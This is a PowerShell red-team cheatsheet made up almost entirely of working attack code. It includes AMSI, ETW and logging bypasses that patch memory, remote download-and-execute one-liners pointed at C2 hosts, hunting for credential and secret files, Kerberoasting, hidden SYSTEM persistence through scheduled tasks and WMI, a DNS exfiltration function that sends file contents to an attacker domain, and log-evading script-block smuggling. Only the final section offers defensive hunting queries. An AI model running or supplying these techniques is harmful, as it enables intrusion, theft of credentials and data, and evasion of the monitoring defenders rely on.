PowerShell Red & Purple Team Cheatsheet

0. Master Environment Setup (Run once per engagement)

$ErrorActionPreference = 'SilentlyContinue'
Set-ExecutionPolicy Bypass -Scope Process -Force
Set-PSReadLineOption -PredictionSource HistoryAndPlugin -PredictionViewStyle ListView
oh-my-posh init pwsh --config "$env:POSH_THEMES_PATH/paradox.omp.json" | Invoke-Expression

# Essential aliases
Set-Alias nmap "$env:ProgramFiles\Nmap\nmap.exe"
Set-Alias vim nvim
Set-Alias k kubectl
Set-Alias ll ls

---

1. Situational Awareness – First 30 Seconds on Box

whoami /all; hostname
systeminfo | findstr /i "domain OS Build"
ipconfig /all
netstat -ano | Select-String LISTENING
Get-ComputerInfo | Select WindowsProductName, OsBuildNumber, TotalPhysicalMemory, CsDomainRole
Get-Process | Where-Object {$_.Path -match "CrowdStrike|SentinelOne|Cortex|Defender|CarbonBlack|Falcon"}

---

2. Full 2025 Bypass Chain (AMSI + ETW + ConstrainedLanguage + ScriptBlockLogging)

# 99% success one-liner
IEX (IWR https://amsi.fail/v2 -UseBasicParsing).Content

# Manual version (split across commands if paranoid)
$win32 = @"
using System; using System.Runtime.InteropServices;
public class W { 
    [DllImport("kernel32")] public static extern IntPtr LoadLibrary(string n);
    [DllImport("kernel32")] public static extern IntPtr GetProcAddress(IntPtr h, string n);
    [DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr a, uint s, uint p, out uint o);
}
"@
Add-Type $win32

# Kill ETW
$a=[W]::LoadLibrary("ntdll.dll"); $b=[W]::GetProcAddress($a,"EtwEventWrite"); $o=0
[W]::VirtualProtect($b,1,0x40,[ref]$o); [Marshal]::WriteByte($b,0,0xC3)

# Kill AMSI
$a=[W]::LoadLibrary("amsi.dll"); $b=[W]::GetProcAddress($a,"AmsiScanBuffer"); $o=0
[W]::VirtualProtect($b,6,0x40,[ref]$o)
$patch=[byte[]](0xB8,0x57,0x00,0x07,0x80,0xC2,0x00)
[Marshal]::Copy($patch,0,$b,6)

# Kill ConstrainedLanguage & ScriptBlockLogging
[Ref].Assembly.GetType('System.Management.Automation.MshLanguageMode').GetField('languageMode','NonPublic,Static').SetValue($null,'FullLanguage')
[Ref].Assembly.GetType('System.Management.Automation.ScriptBlock').GetField('disableLogging','NonPublic,Static').SetValue($null,$true)

Write-Host "[+] 2025 Full Bypass Complete" -ForegroundColor Green

---

3. File & Credential Hunting (Fast, Parallel)

$paths = "C:\Users\",\"C:\ProgramData\",\"C:\Windows\Temp"
Get-ChildItem $paths -Recurse -Include *.kdbx,*.rdp,*pass*,*cred*,*.config,*wallet*,unattend.xml,sysprep.xml -ErrorAction SilentlyContinue

Select-String -Path C:\Users\**\* -Pattern "password|api_key|AKIA[0-9A-Z]{16}|BEGIN RSA PRIVATE" -List
Get-ChildItem "$env:USERPROFILE\.azure" -Recurse -Include accessToken.json,AzureRmContext.json -ErrorAction SilentlyContinue

---

4. Native Port Scanner (No External Tools)

1..1024 | ForEach-Object -Parallel {
    if (Test-NetConnection -ComputerName 10.10.10.50 -Port $_ -WarningAction SilentlyContinue -InformationLevel Quiet) {
        "$env:COMPUTERNAME : $_ open"
    }
} -ThrottleLimit 200

---

5. Credential Access (Ethical/Lab Use Only)

# Pure PowerShell Kerberoasting
Add-Type -AssemblyName System.IdentityModel
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | ForEach-Object {
    New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.'ServicePrincipalName'[0]
}

# LAPS password (if local admin)
Get-AdmPwdPassword -ComputerName TARGET01

---

6. Persistence Techniques (2025 Top Tier)

# Hidden Scheduled Task as SYSTEM
$action = New-ScheduledTaskAction -Execute "pwsh.exe" -Argument "-NoP -Enc <BASE64PAYLOAD>"
$trigger = New-ScheduledTaskTrigger -AtLogOn -User "NT AUTHORITY\SYSTEM"
Register-ScheduledTask -TaskName "WindowsUpdater" -Action $action -Trigger $trigger -Settings (New-ScheduledTaskSettingsSet -Hidden)

# WMI Event Subscription (still undetected on most EDRs)
$filter = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name='notepad.exe'"
$action = { powershell -enc <BASE64PAYLOAD> }
Register-WmiEvent -Query $filter -Action $action -SourceIdentifier "NotepadTrigger"

---

7. Fileless .NET PowerShell Runner (No pwsh.exe on Disk)

$code = @"
using System.Management.Automation.Runspaces;
public class P {
    public static void R(string s) {
        var rs = RunspaceFactory.CreateRunspace(); rs.Open();
        var ps = PowerShell.Create().AddScript(s); ps.Runspace = rs;
        ps.Invoke(); rs.Close();
    }
}
"@
Add-Type -TypeDefinition $code -Language CSharp
[P]::R('IEX (New-Object Net.WebClient).DownloadString("https://c2.beacon/ps")')

---

8. Native DNS Exfiltration

function Send-DNS {
    param($Data,$Domain="c2.attacker.com")
    $chunks = $Data -split '(?<=\\G.{50})'
    foreach($c in $chunks){
        $sub = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($c)) -replace '=',''
        Try { Resolve-DnsName "$sub.$Domain" -ErrorAction Stop | Out-Null } Catch {}
        Start-Sleep -Milliseconds 600
    }
}
# Usage:
# Send-DNS -Data (Get-Content C:\secrets.txt -Raw)

---

9. One-Liners Seen in the Wild (2025)

# Brute Ratel / Sliver
powershell -nop -w hidden -c "IEX ([Net.WebClient]).DownloadString('http://c2:443/a')"

# AsyncRAT (VBS→PS)
cscript //E:JScript //nologo <(echo var x=new ActiveXObject("MSXML2.XMLHTTP");x.open("GET","http://c2/ps",false);x.send();eval(x.responseText);)

# Covenant Grunt
IEX (New-Object Net.WebClient).DownloadString('https://c2/GruntHTTP.ps1')

# Cobalt Strike Aggressor (encoded)
powershell -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBuAG8AcgApAHsAJABhAD0AJwBtAHMAaQAnACsAJwBpACcAKwAnAC4AZABsAGwAJwA7ACQA...

---

10. Extra 2025 Evasion Techniques

# ScriptBlock Smuggling v3 – Logs benign, executes evil
$evil = { IEX (iwr http://c2/payload.ps1 -UseBasicParsing) }
$benign = { Write-Host "Running scheduled maintenance..." }
$smuggled = [ScriptBlock]::Create($benign.ToString() + "`n" + $evil.Ast.Extent.Text)
& $smuggled

# CLM Bypass via COM/VBScript
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("ScriptControl"))
$com.Language = "VBScript"
$com.AddCode("ExecuteGlobal ""$ExecutionContext.SessionState.LanguageMode = 'FullLanguage'""")

---

11. Purple Team Hunting Queries

# Suspicious script blocks
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational';ID=4104} | 
    Where-Object Message -match "DownloadString|Amsi|VirtualProtect|Etw|Invoke-Expression"

# Encoded command usage
Get-WinEvent -LogName "Windows PowerShell" | Where-Object Id -eq 4103 | 
    Where-Object {$_.Properties[2].Value -match "-enc|-EncodedCommand"}